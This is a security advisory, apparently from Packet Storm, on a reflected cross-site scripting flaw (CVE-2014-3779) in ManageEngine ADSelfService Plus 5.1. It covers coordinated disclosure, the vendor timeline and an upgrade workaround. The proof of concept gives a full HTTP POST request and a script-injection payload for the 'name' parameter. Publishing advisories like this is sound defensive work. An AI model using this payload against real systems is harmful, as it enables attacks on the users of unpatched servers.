AdSelfservice Plus version 5.1 suffers from a cross site scripting vulnerability.
a0d411b01817ff92fdcc456cc0eb2cc550bea0919cbcf264893337a75e4ba8c9
Security Advisory :
Exploit Title:
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 03-01-2015
Vendor Homepage :
Software Link : N/A
Version :
ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial
Tested on :
Windows XP SP2 -Host machine ,Windows server 2003 as Active directory
CVE-2014-3779
Type of Application : Web application
Release mode : Coordinated disclosure
Vulnerability Description :
It is observed that the Manageengine ADSelfservice Plus is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and
the unfiltered input is reflected to the user
Proof of concept :
Request :
POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161
subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on
Parameter affected:
name
Payload (Exploit Code):
"";</script><script>alert(0)</script><"
Vulnerable link:
192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Tools used :
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5
## Workaround ##
----------------
Update to newer Version 5.2 Build 5202
http://www.manageengine.com/products/self-service-password/download.html?btmMenu
## TimeLine ##
----------------------
13th Apr 2014 : Bug Discovered
15th Apr 2014 : vendor was notified by e-mail
16th Apr 2014 : Vendor response received
13th May 2014 : Vendor acknowledged and released a patch
22nd May 2014 : Mitre Team provided CVE id
03rd Jan 2015 : Public Disclosure
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed